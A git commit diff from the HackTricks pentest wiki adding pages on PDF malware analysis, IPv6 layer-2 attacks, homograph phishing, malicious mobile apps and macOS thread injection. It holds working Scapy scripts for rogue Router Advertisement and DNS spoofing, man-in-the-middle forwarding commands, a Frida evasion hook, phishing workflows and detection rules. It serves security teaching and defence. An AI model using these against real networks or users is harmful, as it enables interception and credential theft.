Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

2025-10-10 18:36:50 +00:00 · 2025-07-28 12:57:24 +02:00 · 2025-07-28 12:57:24 +02:00 · af4e75a8c8
commit af4e75a8c8
parent 71b9eb4ca7 19a33fbce4
14 changed files with 1170 additions and 108 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -32,6 +32,8 @@
  - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
  - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
  - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)
  - [Homograph Attacks](generic-methodologies-and-resources/phishing-methodology/homograph-attacks.md)
  - [Mobile Phishing Malicious Apps](generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md)
  - [Phishing Files & Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
 - [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
  - [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@ -17,6 +17,94 @@ For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://gith
 For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject.
 ## Common Malicious Constructs
 Attackers often abuse specific PDF objects and actions that automatically execute when the document is opened or interacted with. Keywords worth hunting for:
 * **/OpenAction, /AA** – automatic actions executed on open or on specific events.
 * **/JS, /JavaScript** – embedded JavaScript (often obfuscated or split across objects).
 * **/Launch, /SubmitForm, /URI, /GoToE** – external process / URL launchers.
 * **/RichMedia, /Flash, /3D** – multimedia objects that can hide payloads.
 * **/EmbeddedFile /Filespec** – file attachments (EXE, DLL, OLE, etc.).
 * **/ObjStm, /XFA, /AcroForm** – object streams or forms commonly abused to hide shell-code.
 * **Incremental updates** – multiple %%EOF markers or a very large **/Prev** offset may indicate data appended after signing to bypass AV.
 When any of the previous tokens appear together with suspicious strings (powershell, cmd.exe, calc.exe, base64, etc.) the PDF deserves deeper analysis.
 ---
 ## Static analysis cheat-sheet
 ```bash
 # Fast triage – keyword statistics
 pdfid.py suspicious.pdf
 # Deep dive – decompress/inspect the object tree
 pdf-parser.py -f suspicious.pdf                # interactive
 pdf-parser.py -a suspicious.pdf                # automatic report
 # Search for JavaScript and pretty-print it
 pdf-parser.py -search "/JS" -raw suspicious.pdf | js-beautify -
 # Dump embedded files
 peepdf "open suspicious.pdf" "objects embeddedfile" "extract 15 16 17" -o dumps/
 # Remove passwords / encryptions before processing with other tools
 qpdf --password='secret' --decrypt suspicious.pdf clean.pdf
 # Lint the file with a Go verifier (checks structure violations)
 pdfcpu validate -mode strict clean.pdf
 ```
 Additional useful projects (actively maintained 2023-2025):
 * **pdfcpu** – Go library/CLI able to *lint*, *decrypt*, *extract*, *compress* and *sanitize* PDFs.
 * **pdf-inspector** – browser-based visualizer that renders the object graph and streams.
 * **PyMuPDF (fitz)** – scriptable Python engine that can safely render pages to images to detonate embedded JS in a hardened sandbox.
 ---
 ## Recent attack techniques (2023-2025)
 * **MalDoc in PDF polyglot (2023)** – JPCERT/CC observed threat actors appending an MHT-based Word document with VBA macros after the final **%%EOF**, producing a file that is both a valid PDF and a valid DOC. AV engines parsing just the PDF layer miss the macro. Static PDF keywords are clean, but `file` still prints `%PDF`. Treat any PDF that also contains the string `<w:WordDocument>` as highly suspicious.
 * **Shadow-incremental updates (2024)** – adversaries abuse the incremental update feature to insert a second **/Catalog** with malicious `/OpenAction` while keeping the benign first revision signed. Tools that inspect only the first xref table are bypassed.
 * **Font parsing UAF chain – CVE-2024-30284 (Acrobat/Reader)** – a vulnerable **CoolType.dll** function can be reached from embedded CIDType2 fonts, allowing remote code execution with the privileges of the user once a crafted document is opened. Patched in APSB24-29, May 2024.
 ---
 ## YARA quick rule template
 ```yara
 rule Suspicious_PDF_AutoExec {
    meta:
        description = "Generic detection of PDFs with auto-exec actions and JS"
        author      = "HackTricks"
        last_update = "2025-07-20"
    strings:
        $pdf_magic = { 25 50 44 46 }          // %PDF
        $aa        = "/AA" ascii nocase
        $openact   = "/OpenAction" ascii nocase
        $js        = "/JS" ascii nocase
    condition:
        $pdf_magic at 0 and ( all of ($aa, $openact) or ($openact and $js) )
 }
 ```
 ---
 ## Defensive tips
 1. **Patch fast** – keep Acrobat/Reader on the latest Continuous track; most RCE chains observed in the wild leverage n-day vulnerabilities fixed months earlier.
 2. **Strip active content at the gateway** – use `pdfcpu sanitize` or `qpdf --qdf --remove-unreferenced` to drop JavaScript, embedded files and launch actions from inbound PDFs.
 3. **Content Disarm & Reconstruction (CDR)** – convert PDFs to images (or PDF/A) on a sandbox host to preserve visual fidelity while discarding active objects.
 4. **Block rarely-used features** – enterprise “Enhanced Security” settings in Reader allow disabling of JavaScript, multimedia and 3D rendering.
 5. **User education** – social engineering (invoice & resume lures) remains the initial vector; teach employees to forward suspicious attachments to IR.
 ## References
 * JPCERT/CC – “MalDoc in PDF – Detection bypass by embedding a malicious Word file into a PDF file” (Aug 2023)  
 * Adobe – Security update for Acrobat and Reader (APSB24-29, May 2024)
 {{#include ../../../banners/hacktricks-training.md}}
--- a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md
@ -112,12 +112,191 @@ To identify IPv6 addresses, certain DNS record types can be queried:
 After pinpointing IPv6 addresses associated with an organization, the `ping6` utility can be used for probing. This tool helps in assessing the responsiveness of identified IPv6 addresses, and might also assist in discovering adjacent IPv6 devices.
 ## IPv6 Local Network Attack Techniques
 The following sections cover practical layer-2 IPv6 attacks that can be executed **inside the same /64 segment** without knowing any global prefix.  All the packets shown below are **link-local** and travel only through the local switch, making them extremely stealthy in most environments.
 ### System Tuning for a Stable Lab
 Before playing with IPv6 traffic it is recommended to harden your box to avoid being poisoned by your own tests and to get the best performance during massive packet injection/sniffing.
 ```bash
 # Enable promiscuous mode to capture all frames
 sudo ip link set dev eth0 promisc on
 # Ignore rogue Router Advertisements & Redirects coming from the segment
 sudo sysctl -w net.ipv6.conf.all.accept_ra=0
 sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
 # Increase fd / backlog limits when generating lots of traffic
 sudo sysctl -w fs.file-max=100000
 sudo sysctl -w net.core.somaxconn=65535
 sudo sysctl -w net.ipv4.tcp_tw_reuse=1
 ```
 ### Passive NDP & DHCPv6 Sniffing
 Because every IPv6 host **automatically joins multiple multicast groups** (`ff02::1`, `ff02::2`, …) and speaks ICMPv6 for SLAAC/NDP, you can map the whole segment without sending a single packet.  The following Python/Scapy one-liner listens for the most interesting L2 messages and prints a colored, timestamped log of who is who:
 ```python
 #!/usr/bin/env python3
 from scapy.all import *
 from scapy.layers.dhcp6 import *
 from datetime import datetime
 from colorama import Fore, Style, init
 import argparse
 init(autoreset=True)
 # Human-readable names for protocols we care about
 DHCP6_TYPES = {
    DHCP6_Solicit:    'Solicit',
    DHCP6_Advertise:  'Advertise',
    DHCP6_Request:    'Request',
    DHCP6_Reply:      'Reply',
    DHCP6_Renew:      'Renew',
    DHCP6_Rebind:     'Rebind',
    DHCP6_RelayForward:'Relay-Forward',
    DHCP6_RelayReply: 'Relay-Reply'
 }
 ICMP6_TYPES = {
    ICMPv6ND_RS:      ('Router Solicitation',  Fore.CYAN),
    ICMPv6ND_RA:      ('Router Advertisement', Fore.GREEN),
    ICMPv6ND_NS:      ('Neighbor Solicitation',Fore.BLUE),
    ICMPv6ND_NA:      ('Neighbor Advertisement',Fore.MAGENTA),
    ICMPv6ND_Redirect:('Redirect',             Fore.LIGHTRED_EX),
    ICMPv6MLReport:   ('MLD Report',           Fore.LIGHTCYAN_EX),
    ICMPv6MLReport2:  ('MLD Report',           Fore.LIGHTCYAN_EX),
    ICMPv6MLDone:     ('MLD Done',             Fore.LIGHTCYAN_EX),
    ICMPv6EchoRequest:('Echo Request',         Fore.LIGHTBLACK_EX),
    ICMPv6EchoReply:  ('Echo Reply',           Fore.LIGHTBLACK_EX)
 }
 def handler(pkt):
    eth_src = pkt[Ether].src if Ether in pkt else '?'
    eth_dst = pkt[Ether].dst if Ether in pkt else '?'
    ip6_src = pkt[IPv6].src if IPv6 in pkt else '?'
    ip6_dst = pkt[IPv6].dst if IPv6 in pkt else '?'
    # Identify protocol family first
    for proto,(desc,color) in ICMP6_TYPES.items():
        if proto in pkt:
            break
    else:
        if UDP in pkt and pkt[UDP].dport == 547:  # DHCPv6 server port
            for dhcp_t,name in DHCP6_TYPES.items():
                if dhcp_t in pkt:
                    desc = 'DHCPv6 – '+name; color = Fore.YELLOW; break
            else:
                return  # not a DHCPv6 message we track
        else:
            return  # not interesting
    print(color + f"[{datetime.now().strftime('%H:%M:%S')}] {desc}")
    print(f"  MAC  {eth_src} -> {eth_dst}")
    print(f"  IPv6 {ip6_src} -> {ip6_dst}")
    print('-'*60)
 if __name__ == '__main__':
    argp = argparse.ArgumentParser(description='IPv6 NDP & DHCPv6 sniffer')
    argp.add_argument('-i','--interface',required=True,help='Interface to sniff')
    argp.add_argument('-t','--time',type=int,default=0,help='Duration (0 = infinite)')
    a = argp.parse_args()
    sniff(iface=a.interface,prn=handler,timeout=a.time or None,store=0)
 ```
 Result: a full **link-local topology** (MAC ⇄ IPv6) in a matter of seconds, without triggering IPS/IDS systems that rely on active scans.
 ### Router Advertisement (RA) Spoofing
 IPv6 hosts rely on **ICMPv6 Router Advertisements** for default-gateway discovery.  If you inject forged RAs **more frequently** than the legitimate router, devices will silently switch to you as the gateway.
 ```python
 #!/usr/bin/env python3
 from scapy.all import *
 import argparse
 p = argparse.ArgumentParser()
 p.add_argument('-i','--interface',required=True)
 p.add_argument('-m','--mac',required=True,help='Source MAC (will be put in SrcLL option)')
 p.add_argument('--llip',required=True,help='Link-local source IP, e.g. fe80::dead:beef')
 p.add_argument('-l','--lifetime',type=int,default=1800,help='Router lifetime')
 p.add_argument('--interval',type=int,default=5,help='Seconds between RAs')
 p.add_argument('--revert',action='store_true',help='Send lifetime=0 to undo attack')
 args = p.parse_args()
 lifetime = 0 if args.revert else args.lifetime
 ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/
      ICMPv6ND_RA(routerlifetime=lifetime, prf=0x1)/  # High preference
      ICMPv6NDOptSrcLLAddr(lladdr=args.mac))
 send(ra,iface=args.interface,loop=1,inter=args.interval)
 ```
 To actually **forward traffic** after winning the race:
 ```bash
 sudo sysctl -w net.ipv6.conf.all.forwarding=1
 sudo ip6tables -A FORWARD -i eth0 -j ACCEPT
 sudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
 ```
 ### RDNSS (DNS) Spoofing via RA
 [RFC 8106](https://datatracker.ietf.org/doc/html/rfc8106) allows adding a **Recursive DNS Server (RDNSS)** option inside a RA.  Modern OSes (Win 10 ≥1709, Win 11, macOS Big Sur, Linux systemd-resolved, …) automatically trust it:
 ```python
 #!/usr/bin/env python3
 from scapy.all import *
 import argparse
 p = argparse.ArgumentParser()
 p.add_argument('-i','--interface',required=True)
 p.add_argument('--llip',required=True)
 p.add_argument('--dns',required=True,help='Fake DNS IPv6')
 p.add_argument('--lifetime',type=int,default=600)
 p.add_argument('--interval',type=int,default=5)
 args = p.parse_args()
 ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/
      ICMPv6ND_RA(routerlifetime=0)/
      ICMPv6NDOptRDNSS(dns=[args.dns],lifetime=args.lifetime))
 send(ra,iface=args.interface,loop=1,inter=args.interval)
 ```
 Clients will **prepend** your DNS to their resolver list for the given lifetime, granting full DNS hijacking until the value expires or you send a `lifetime=0` revert.
 ### DHCPv6 DNS Spoofing (mitm6)
 Instead of SLAAC, Windows networks often depend on **stateless DHCPv6** for DNS.  [mitm6](https://github.com/rofl0r/mitm6) automatically replies to `Solicit` messages with an **Advertise → Reply** flow that assigns **your link-local address as DNS for 300 seconds**.  This unlocks:
 * NTLM relay attacks (WPAD + DNS hijacking)
 * Intercepting internal name resolution without touching routers
 Typical usage:
 ```bash
 sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning
 ```
 ### Defences
 * **RA Guard / DHCPv6 Guard / ND Inspection** on managed switches.
 * Port ACLs that allow only the legitimate router’s MAC to send RAs.
 * Monitor for **unsolid high-rate RAs** or sudden **RDNSS changes**.
 * Disabling IPv6 on endpoints is a temporary workaround that often breaks modern services and hides blind spots – prefer L2 filtering instead.
 ## References
 - [Legless – IPv6 Penetration Testing](https://blog.exploit.org/caster-legless/)
 - [mitm6](https://github.com/rofl0r/mitm6)
 - [RFC 8106 – IPv6 ND DNS Configuration](https://datatracker.ietf.org/doc/html/rfc8106)
 - [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
 - [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/generic-methodologies-and-resources/phishing-methodology/README.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md
@ -25,6 +25,10 @@
 - **hypened subdomain**: Change the **dot for a hyphen** of a subdomain (e.g., www-zelster.com).
 - **New TLD**: Same domain using a **new TLD** (e.g., zelster.org)
 - **Homoglyph**: It **replaces** a letter in the domain name with **letters that look similar** (e.g., zelfser.com).
 {{#ref}}
 homograph-attacks.md
 {{#endref}}
 - **Transposition:** It **swaps two letters** within the domain name (e.g., zelsetr.com).
 - **Singularization/Pluralization**: Adds or removes “s” at the end of the domain name (e.g., zeltsers.com).
 - **Omission**: It **removes one** of the letters from the domain name (e.g., zelser.com).
@ -466,6 +470,12 @@ Attackers can silently copy malicious commands into the victim’s clipboard fro
 clipboard-hijacking.md
 {{#endref}}
 ## Mobile Phishing & Malicious App Distribution (Android & iOS)
 {{#ref}}
 mobile-phishing-malicious-apps.md
 {{#endref}}
 ## References
 - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
--- a/src/generic-methodologies-and-resources/phishing-methodology/homograph-attacks.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/homograph-attacks.md
@ -0,0 +1,108 @@
 # Homograph / Homoglyph Attacks in Phishing
 {{#include ../../banners/hacktricks-training.md}}
 ## Overview
 A homograph (aka homoglyph) attack abuses the fact that many **Unicode code points from non-Latin scripts are visually identical or extremely similar to ASCII characters**. By replacing one or more Latin characters with their look-alike counterparts, an attacker can craft:
 * Display names, subjects or message bodies that look legitimate to the human eye but bypass keyword-based detections.
 * Domains, sub-domains or URL paths that fool victims into believing they are visiting a trusted site.
 Because every glyph is identified internally by its **Unicode code point**, a single substituted character is enough to defeat naïve string comparisons (e.g., `"Παypal.com"` vs. `"Paypal.com"`).
 ## Typical Phishing Workflow
 1. **Craft message content** – Replace specific Latin letters in the impersonated brand / keyword with visually indistinguishable characters from another script (Greek, Cyrillic, Armenian, Cherokee, etc.).
 2. **Register supporting infrastructure** – Optionally register a homoglyph domain and obtain a TLS certificate (most CAs do no visual similarity checks).
 3. **Send email / SMS** – The message contains homoglyphs in one or more of the following locations:
   * Sender display name (e.g., `Ηеlрdеѕk`)
   * Subject line (`Urgеnt Аctіon Rеquіrеd`)
   * Hyperlink text or fully qualified domain name
 4. **Redirect chain** – Victim is bounced through seemingly benign websites or URL shorteners before landing on the malicious host that harvests credentials / delivers malware.
 ## Unicode Ranges Commonly Abused
 | Script | Range | Example glyph | Looks like |
 |--------|-------|---------------|------------|
 | Greek  | U+0370-03FF | `Η` (U+0397) | Latin `H` |
 | Greek  | U+0370-03FF | `ρ` (U+03C1) | Latin `p` |
 | Cyrillic | U+0400-04FF | `а` (U+0430) | Latin `a` |
 | Cyrillic | U+0400-04FF | `е` (U+0435) | Latin `e` |
 | Armenian | U+0530-058F | `օ` (U+0585) | Latin `o` |
 | Cherokee | U+13A0-13FF | `Ꭲ` (U+13A2) | Latin `T` |
 > Tip: Full Unicode charts are available at [unicode.org](https://home.unicode.org/).
 ## Detection Techniques
 ### 1. Mixed-Script Inspection
 Phishing emails aimed at an English-speaking organisation should rarely mix characters from multiple scripts.  A simple but effective heuristic is to:
 1. Iterate each character of the inspected string.
 2. Map the code point to its Unicode block.
 3. Raise an alert if more than one script is present **or** if non-Latin scripts appear where they are not expected (display name, domain, subject, URL, etc.).
 Python proof-of-concept:
 ```python
 import unicodedata as ud
 from collections import defaultdict
 SUSPECT_FIELDS = {
    "display_name": "Ηоmоgraph Illusion",     # example data
    "subject": "Finаnꮯiаl Տtatеmеnt",
    "url": "https://xn--messageconnecton-2kb.blob.core.windows.net"  # punycode
 }
 for field, value in SUSPECT_FIELDS.items():
    blocks = defaultdict(int)
    for ch in value:
        if ch.isascii():
            blocks['Latin'] += 1
        else:
            name = ud.name(ch, 'UNKNOWN')
            block = name.split(' ')[0]     # e.g., 'CYRILLIC'
            blocks[block] += 1
    if len(blocks) > 1:
        print(f"[!] Mixed scripts in {field}: {dict(blocks)} -> {value}")
 ```
 ### 2. Punycode Normalisation (Domains)
 Internationalised Domain Names (IDNs) are encoded with **punycode** (`xn--`). Converting every hostname to punycode and then back to Unicode allows matching against a whitelist or performing similarity checks (e.g., Levenshtein distance) **after** the string has been normalised.
 ```python
 import idna
 hostname = "Ρаypal.com"   # Greek Rho + Cyrillic a
 puny = idna.encode(hostname).decode()
 print(puny)  # xn--yl8hpyal.com
 ```
 ### 3. Homoglyph Dictionaries / Algorithms
 Tools such as **dnstwist** (`--homoglyph`) or **urlcrazy** can enumerate visually-similar domain permutations and are useful for proactive takedown / monitoring.
 ## Prevention & Mitigation
 * Enforce strict DMARC/DKIM/SPF policies – prevent spoofing from unauthorised domains.
 * Implement the detection logic above in **Secure Email Gateways** and **SIEM/XSOAR** playbooks.
 * Flag or quarantine messages where display name domain ≠ sender domain.
 * Educate users: copy-paste suspicious text into a Unicode inspector, hover links, never trust URL shorteners.
 ## Real-World Examples
 * Display name: `Сonfidеntiаl Ꭲiꮯkеt` (Cyrillic `С`, `е`, `а`; Cherokee `Ꭲ`; Latin small capital `ꮯ`).
 * Domain chain: `bestseoservices.com` ➜ municipal `/templates` directory ➜ `kig.skyvaulyt.ru` ➜ fake Microsoft login at `mlcorsftpsswddprotcct.approaches.it.com` protected by custom OTP CAPTCHA.
 * Spotify impersonation: `Sρօtifս` sender with link hidden behind `redirects.ca`.
 These samples originate from Unit 42 research (July 2025) and illustrate how homograph abuse is combined with URL redirection and CAPTCHA evasion to bypass automated analysis.
 ## References
 - [The Homograph Illusion: Not Everything Is As It Seems](https://unit42.paloaltonetworks.com/homograph-attacks/)
 - [Unicode Character Database](https://home.unicode.org/)  
 - [dnstwist – domain permutation engine](https://github.com/elceef/dnstwist)
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
@ -0,0 +1,98 @@
 # Mobile Phishing & Malicious App Distribution (Android & iOS)
 {{#include ../../banners/hacktricks-training.md}}
 > [!INFO]
 > This page covers techniques used by threat actors to distribute **malicious Android APKs** and **iOS mobile-configuration profiles** through phishing (SEO, social engineering, fake stores, dating apps, etc.).
 > The material is adapted from the SarangTrap campaign exposed by Zimperium zLabs (2025) and other public research.
 ## Attack Flow
 1. **SEO/Phishing Infrastructure**
   * Register dozens of look-alike domains (dating, cloud share, car service…).  
     – Use local language keywords and emojis in the `<title>` element to rank in Google.  
     – Host *both* Android (`.apk`) and iOS install instructions on the same landing page.
 2. **First Stage Download**
   * Android: direct link to an *unsigned* or “third-party store” APK.  
   * iOS: `itms-services://` or plain HTTPS link to a malicious **mobileconfig** profile (see below).
 3. **Post-install Social Engineering**
   * On first run the app asks for an **invitation / verification code** (exclusive access illusion).  
   * The code is **POSTed over HTTP** to the Command-and-Control (C2).  
   * C2 replies `{"success":true}` ➜ malware continues.  
   * Sandbox / AV dynamic analysis that never submits a valid code sees **no malicious behaviour** (evasion).
 4. **Runtime Permission Abuse** (Android)
   * Dangerous permissions are only requested **after positive C2 response**:
     ```xml
     <uses-permission android:name="android.permission.READ_CONTACTS"/>
     <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
     <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
     <!-- Older builds also asked for SMS permissions -->
     ```
   * Recent variants **remove `<uses-permission>` for SMS from `AndroidManifest.xml`** but leave the Java/Kotlin code path that reads SMS through reflection ⇒ lowers static score while still functional on devices that grant the permission via `AppOps` abuse or old targets.
 5. **Facade UI & Background Collection**
   * App shows harmless views (SMS viewer, gallery picker) implemented locally.  
   * Meanwhile it exfiltrates:
     - IMEI / IMSI, phone number
     - Full `ContactsContract` dump (JSON array)
     - JPEG/PNG from `/sdcard/DCIM` compressed with [Luban](https://github.com/Curzibn/Luban) to reduce size
     - Optional SMS content (`content://sms`)
     Payloads are **batch-zipped** and sent via `HTTP POST /upload.php`.
 6. **iOS Delivery Technique**
   * A single **mobile-configuration profile** can request `PayloadType=com.apple.sharedlicenses`, `com.apple.managedConfiguration` etc. to enroll the device in “MDM”-like supervision.  
   * Social-engineering instructions:
     1. Open Settings ➜ *Profile downloaded*.
     2. Tap *Install* three times (screenshots on the phishing page).  
     3. Trust the unsigned profile ➜ attacker gains *Contacts* & *Photo* entitlement without App Store review.
 7. **Network Layer**
   * Plain HTTP, often on port 80 with HOST header like `api.<phishingdomain>.com`.
   * `User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; Pixel 6 Build/TQ3A.230805.001)` (no TLS → easy to spot).
 ## Defensive Testing / Red-Team Tips
 * **Dynamic Analysis Bypass** – During malware assessment, automate the invitation code phase with Frida/Objection to reach the malicious branch.
 * **Manifest vs. Runtime Diff** – Compare `aapt dump permissions` with runtime `PackageManager#getRequestedPermissions()`; missing dangerous perms is a red flag.
 * **Network Canary** – Configure `iptables -p tcp --dport 80 -j NFQUEUE` to detect unsolid POST bursts after code entry.
 * **mobileconfig Inspection** – Use `security cms -D -i profile.mobileconfig` on macOS to list `PayloadContent` and spot excessive entitlements.
 ## Blue-Team Detection Ideas
 * **Certificate Transparency / DNS Analytics** to catch sudden bursts of keyword-rich domains.
 * **User-Agent & Path Regex**: `(?i)POST\s+/(check|upload)\.php` from Dalvik clients outside Google Play.
 * **Invite-code Telemetry** – POST of 6–8 digit numeric codes shortly after APK install may indicate staging.
 * **MobileConfig Signing** – Block unsigned configuration profiles via MDM policy.
 ## Useful Frida Snippet: Auto-Bypass Invitation Code
 ```python
 # frida -U -f com.badapp.android -l bypass.js --no-pause
 # Hook HttpURLConnection write to always return success
 Java.perform(function() {
  var URL = Java.use('java.net.URL');
  URL.openConnection.implementation = function() {
    var conn = this.openConnection();
    var HttpURLConnection = Java.use('java.net.HttpURLConnection');
    if (Java.cast(conn, HttpURLConnection)) {
        conn.getResponseCode.implementation = function(){ return 200; };
        conn.getInputStream.implementation = function(){
            return Java.use('java.io.ByteArrayInputStream').$new("{\"success\":true}".getBytes());
        };
    }
    return conn;
  };
 });
 ```
 ## Indicators (Generic)
 ```
 /req/checkCode.php        # invite code validation
 /upload.php               # batched ZIP exfiltration
 LubanCompress 1.1.8       # "Luban" string inside classes.dex
 ```
 ## References
 - [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
 - [Luban – Android image compression library](https://github.com/Curzibn/Luban)
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
@ -9,17 +9,17 @@
 ## 1. Thread Hijacking
-Initially, the **`task_threads()`** function is invoked on the task port to obtain a thread list from the remote task. A thread is selected for hijacking. This approach diverges from conventional code injection methods as creating a new remote thread is prohibited due to the new mitigation blocking `thread_create_running()`.
+Initially, the `task_threads()` function is invoked on the task port to obtain a thread list from the remote task. A thread is selected for hijacking. This approach diverges from conventional code-injection methods as creating a new remote thread is prohibited due to the mitigation that blocks `thread_create_running()`.
-To control the thread, **`thread_suspend()`** is called, halting its execution.
+To control the thread, `thread_suspend()` is called, halting its execution.
-The only operations permitted on the remote thread involve **stopping** and **starting** it, **retrieving** and **modifying** its register values. Remote function calls are initiated by setting registers `x0` to `x7` to the **arguments**, configuring **`pc`** to target the desired function, and activating the thread. Ensuring the thread does not crash after the return necessitates detection of the return.
+The only operations permitted on the remote thread involve **stopping** and **starting** it and **retrieving**/**modifying** its register values. Remote function calls are initiated by setting registers `x0` to `x7` to the **arguments**, configuring `pc` to target the desired function, and resuming the thread. Ensuring the thread does not crash after the return necessitates detection of the return.
-One strategy involves **registering an exception handler** for the remote thread using `thread_set_exception_ports()`, setting the `lr` register to an invalid address before the function call. This triggers an exception post-function execution, sending a message to the exception port, enabling state inspection of the thread to recover the return value. Alternatively, as adopted from Ian Beer’s triple_fetch exploit, `lr` is set to loop infinitely. The thread's registers are then continuously monitored until **`pc` points to that instruction**.
+One strategy involves registering an **exception handler** for the remote thread using `thread_set_exception_ports()`, setting the `lr` register to an invalid address before the function call. This triggers an exception post-function execution, sending a message to the exception port, enabling state inspection of the thread to recover the return value. Alternatively, as adopted from Ian Beer’s *triple_fetch* exploit, `lr` is set to loop infinitely; the thread’s registers are then continuously monitored until `pc` points to that instruction.
 ## 2. Mach ports for communication
-The subsequent phase involves establishing Mach ports to facilitate communication with the remote thread. These ports are instrumental in transferring arbitrary send and receive rights between tasks.
+The subsequent phase involves establishing Mach ports to facilitate communication with the remote thread. These ports are instrumental in transferring arbitrary send/receive rights between tasks.
 For bidirectional communication, two Mach receive rights are created: one in the local and the other in the remote task. Subsequently, a send right for each port is transferred to the counterpart task, enabling message exchange.
@ -33,11 +33,11 @@ Completion of these steps results in the establishment of Mach ports, laying the
 ## 3. Basic Memory Read/Write Primitives
-In this section, the focus is on utilizing the execute primitive to establish basic memory read and write primitives. These initial steps are crucial for gaining more control over the remote process, though the primitives at this stage won't serve many purposes. Soon, they will be upgraded to more advanced versions.
+In this section, the focus is on utilizing the execute primitive to establish basic memory read/write primitives. These initial steps are crucial for gaining more control over the remote process, though the primitives at this stage won't serve many purposes. Soon, they will be upgraded to more advanced versions.
-### Memory Reading and Writing Using Execute Primitive
+### Memory reading and writing using the execute primitive
-The goal is to perform memory reading and writing using specific functions. For reading memory, functions resembling the following structure are used:
+The goal is to perform memory reading and writing using specific functions. For **reading memory**:
 ```c
 uint64_t read_func(uint64_t *address) {
@ -45,7 +45,7 @@ uint64_t read_func(uint64_t *address) {
 }
 ```
-And for writing to memory, functions similar to this structure are used:
+For **writing memory**:
 ```c
 void write_func(uint64_t *address, uint64_t value) {
@ -53,7 +53,7 @@ void write_func(uint64_t *address, uint64_t value) {
 }
 ```
-These functions correspond to the given assembly instructions:
+These functions correspond to the following assembly:
 ```
 _read_func:
@ -64,23 +64,19 @@ _write_func:
    ret
 ```
-### Identifying Suitable Functions
+### Identifying suitable functions
 A scan of common libraries revealed appropriate candidates for these operations:
-1. **Reading Memory:**
+1. **Reading memory — `property_getName()`** (libobjc):
   The `property_getName()` function from the [Objective-C runtime library](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) is identified as a suitable function for reading memory. The function is outlined below:
 ```c
 const char *property_getName(objc_property_t prop) {
-      return prop->name;
+    return prop->name;
 }
 ```
-This function effectively acts like the `read_func` by returning the first field of `objc_property_t`.
+2. **Writing memory — `_xpc_int64_set_value()`** (libxpc):
 2. **Writing Memory:**
   Finding a pre-built function for writing memory is more challenging. However, the `_xpc_int64_set_value()` function from libxpc is a suitable candidate with the following disassembly:
 ```c
 __xpc_int64_set_value:
@ -88,93 +84,108 @@ __xpc_int64_set_value:
    ret
 ```
-To perform a 64-bit write at a specific address, the remote call is structured as:
+To perform a 64-bit write at an arbitrary address:
 ```c
-_xpc_int64_set_value(address - 0x18, value)
+_xpc_int64_set_value(address - 0x18, value);
 ```
 With these primitives established, the stage is set for creating shared memory, marking a significant progression in controlling the remote process.
 ## 4. Shared Memory Setup
-The objective is to establish shared memory between local and remote tasks, simplifying data transfer and facilitating the calling of functions with multiple arguments. The approach involves leveraging `libxpc` and its `OS_xpc_shmem` object type, which is built upon Mach memory entries.
+The objective is to establish shared memory between local and remote tasks, simplifying data transfer and facilitating the calling of functions with multiple arguments. The approach leverages `libxpc` and its `OS_xpc_shmem` object type, which is built upon Mach memory entries.
-### Process Overview:
+### Process overview
-1. **Memory Allocation**:
+1. **Memory allocation**
-
+   * Allocate memory for sharing using `mach_vm_allocate()`.  
